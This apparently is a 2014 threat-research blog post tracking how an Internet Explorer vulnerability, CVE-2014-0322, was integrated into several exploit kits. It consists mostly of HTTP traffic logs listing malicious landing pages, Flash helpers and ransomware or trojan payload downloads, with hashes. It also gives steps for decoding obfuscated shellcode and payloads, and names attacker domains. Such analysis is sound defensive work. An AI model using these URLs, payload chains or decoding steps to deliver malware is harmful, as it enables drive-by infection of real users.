2014-03-24 - Exploit Integration

CVE-2014-0322 integrating Exploit Kits

It took more times than I thought, but here we are : CVE-2014-0322 is now in Exploit Kit. Seems to be first in Infinity  Fiesta.

Infinity EK :

Thanks Timo Hirvonen for fixing my ugly approach to that one.

Successful pass in Win7 with Flash and ante kb2925418

GET http://saarbangers-metal-festival .de/201403/br/573133020.htm
200 OK (text/html) 

Piece of Encoded CVE-2014-0322 and call for helper

CVE-2014-0322 after deobfus

GET http://saarbangers-metal-festival .de/swf.swf
200 OK (application/x-shockwave-flash)  e8693573caecf1cab91aa578e1d62ab0 Swt Helper

GET http://saarbangers-metal-festival .de/6084.swf
200 OK (application/x-shockwave-flash) CVE-2013-0634

GET http://saarbangers-metal-festival .de/6084.swf
200 OK (application/x-shockwave-flash)

GET http://saarbangers-metal-festival .de/9073.mp3?rnd=75091
200 OK (application/x-msdownload)

GET http://saarbangers-metal-festival .de/9073.mp3?rnd=60183
200 OK (application/x-msdownload)

Files : 2 fiddlers (OwnCloud)
You'll find a pcap too on the nice Traffic Malware Analysis.

Fiesta :

2014-03-25 - Thanks EKWatcher for Referer.
Fiesta : Successful pass in Win7 IE10 with Flash and ante kb2925418

GET http://bgpjterlrw.no-ip .info/mycxql2/counter.php?id=2
301 Redirect to http://bgpjterlrw.no-ip.info/mycxql2/?2

GET http://bgpjterlrw.no-ip .info/mycxql2/?2
200 OK (text/html) http://pastebin.com/mxWFtG83

GET http://bgpjterlrw.no-ip .info/mycxql2/?1723d0e41c0f5f6458545f08560b54050501050b5f0407040a0201005509060705
200 OK (text/html) http://pastebin.com/znN5J1nU <- CVE-2014-0322 

Partial Decoding of the components to exploit CVE-2014-0322

"Ladyr" : Once Deobfuscated : http://pastebin.com/qVafD361
"Felt" Shellcode : http://pastebin.com/w22nNLg8

Following  EKWatcher guidelines :
Base64 decode on the "Felt" parameter

piece of Base64decode (felt)
Opening the output in a Disassembler :

in diStorm

or send the output online (thanks Ben Layer)

B64 decoded shellcode in online disassembler
Figuring that it's 0x20 Xored you can then see for instance the payload URL :

Xor 0x20 on B64 decoded "Felt" parameter

GET http://bgpjterlrw.no-ip .info/mycxql2/?533de2b2f35a74c55c50555f570953030105045c5e0600020e060057540b010102
200 OK (application/x-shockwave-flash)  881a4d9fd2902e0af4e4a06bbc6ba63a <- Flash Helper

GET http://bgpjterlrw.no-ip .info/mycxql2/?1f210081f3d41f5b5216590a020b0900055005090b045a010a53010201095b0206;7
200 OK (application/octet-stream) - 98f29794b29c7a90cfc6af778a3d503c Redyms/Ramdo

Files : Fiddler

FlashPack : 

Successful CVE-2014-0322 pass in FlashPack : 2014-03-27

GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/allow.php
200 OK (text/html)

GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/js/pd.php?id=68656c6c6f303332322e636f6d
200 OK (text/html)

POST http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/get_json.php
200 OK (text/html)

GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/msie.php
200 OK (text/html) <-- CVE-2013-2551

GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/link2jpg/index.php
200 OK (text/html)

Once decoded :

Code targeting CVE-2014-0322 in FlashPack
GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/link2jpg/e56d2.swf
200 OK (application/x-shockwave-flash) Flash Helper : f9e1338083a03d1b965ce8502c109372

GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/link2jpg/Erido.jpg
200 OK (image/jpeg)

Same file name and Xor key (95) as when this 0day has been first spotted live.

Erido.jpg after xor 95 pass.
It will also split in two  with same name :

Dropped in %temp%\low
c139ca52a05605926087a86a44c9f860 contacting : 

kilensis.com /terkas/audio/loadmsie10.php | | IPSYSTEMS | UA | IPSYSTEMS.COM.UA | TK IPSYSTEMS LTD.

and  here is the second file :

Files : Fiddler and samples  (OwnCloud)
<post publication edit>You'll also find Pcap and samples by malware-traffic</edit>

Angler EK :

Successfull pass for CVE-2014-0322 in Angler EK
GET http://callositfrenavisseque.teampac12 .com/s0dd2c8vc3
200 OK (text/html)

Piece of the code targeting CVE-2014-0322 in Angler EK 2014-03-28
Once decoded :

Why wasting time renaming functions ?

GET http://callositfrenavisseque.teampac12 .com/2ZhNTwSvCb7q0rUMk1eeQBch4k8SW3YuQb72x92634nu21RH
200 OK (text/html) 7aeefe2f40d607df2c51b89f912d9b37

GET http://callositfrenavisseque.teampac12 .com/QNZhV37gKdfsOwXFL86KIlYIKGhDK4PXmb55GtwVhjzPf-HP
200 OK (application/octet-stream)  0d62ee4c2fe169a65cd2d9afde80b6bc (Reveton Ransomware)

Files : Landing,SWF,Encoded and Decoded Payload (see here for decoding)

Sweet Orange :

Successful CVE-2014-0322 pass in Sweet Orange
GET http://bkse .pw/LiveUser_Admin/crypto.php?category=256
200 OK (text/html) http://pastebin.com/pPGJwa5f

CVE-2014-0322 in Sweet Orange landing after some replace and b64 decode

GET http://bkse .pw/LiveUser_Admin/kaztPkw
200 OK (application/x-shockwave-flash) bef27f41b067d6f842c471562f78735b SWF Helper

GET http://duckfood .pw/customer.php?press=589&support=4&index=457&technical=171&game=555&polls=265&intm=447&flash=726&trans=335
200 OK (application/octet-stream)  b87500d8d40ec1ac249f44c29a71f07f (Target Japan)

Files : Fiddler/Sample 

HiMan :
Edit : 2014-04-17 - Thanks Eoin Miller for hints on finding it.

CVE-2014-0322 pass in HiMan 2014-04-16

GET http://alertsecurity3-0004 .pw/fulypixojn.php
200 OK (text/html)

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/at.php?hg=687474703a2f2f616c6572747365637572697479332d303030342e70772f6b79646f706f636665766f6b6f786f71712f747572662e7068703f6e3d3730366337353637
200 OK (text/html) CVE-2014-0322 http://pastebin.com/uaWHZNwe

Piece of CVE-2014-0322 in HiMan after deobfuscation 2014-04-16

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/rues3.swf
200 OK (application/x-shockwave-flash) Flash Helper d67a83c6b3062cc5b451da2bd7c97499

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/turf2.php
200 OK (application/octet-stream) Payload seems to be a test file.

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/att.php?hg=687474703a2f2f616c6572747365637572697479332d303030342e70772f6b79646f706f636665766f6b6f786f71712f747572662e7068703f6e3d3730366337353637
200 OK (text/html) CVE-2013-2551 try

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/cw.php?rbbr=687474703a2f2f616c6572747365637572697479332d303030342e70772f6b79646f706f636665766f6b6f786f71712f747572662e7068703f6e3d3730366337353637
200 OK (text/html) Call for Flash CVE

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/nn.php?nh=687474703a2f2f616c6572747365637572697479332d303030342e70772f6b79646f706f636665766f6b6f786f71712f747572662e7068703f6e3d3730366337353637
200 OK (text/html) Call for Silverlight CVE

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/uf.jar
200 OK (application/java-archive)

Files :  2 Fiddler (on non CVE-2014-0322 but containing the real payload which is an Urausy like ransomware)

Note : I know it's in Styx  <- Wrong.
(See this : http://pastebin.com/Ya8kZihy ) <edit 2014-04-10> Got them.. The  Vuln is not there. Was maybe a test or something. </edit>
This is the Styx from the guys who were pushing Kovter and Zaccess in Sakura till december 2013 who then switch to styx. But I do not have referer. Would love feedback on this.

Last known (to me) position :

2014/02/16 12:3x;goo6.payingmails.ostrowwlkp.pl;80;
2014/02/16 12:3x;mami1.payingmails.ostrowwlkp.pl;80;
2014/02/16 13:3x;alfad.magsforeveryone.ostrowwlkp.pl;80;
2014/02/16 13:3x;kinov.magsforeveryone.ostrowwlkp.pl;80;
2014/02/16 13:4x;wmczo.iaozu.ostrowwlkp.pl;80;
2014/02/16 13:4x;shiyu.iaozu.ostrowwlkp.pl;80;
2014/02/16 13:5x;opera.iaozu.ostrowwlkp.pl;80;
2014/02/16 16:1x;talen.cncnc.ostrowwlkp.pl;80;
2014/02/16 16:1x;asla.cncnc.ostrowwlkp.pl;80;

<edit 2014-04-10>
For those interested they are now here :
2014/04/10 xx:xx:xx;vivas.etudiants.ostrowiec.pl;80;
2014/04/10 xx:xx:xx;tv24.etudiants.ostrowiec.pl;80;
2014/04/10 xx:xx:xx;auror.elcuara.ostrowiec.pl;80;
2014/04/10 xx:xx:xx;thete.elcuara.ostrowiec.pl;80;

Read More :

CVE-2014-0322 Goon Infinity Redkit v2 Fiesta Sweet Orange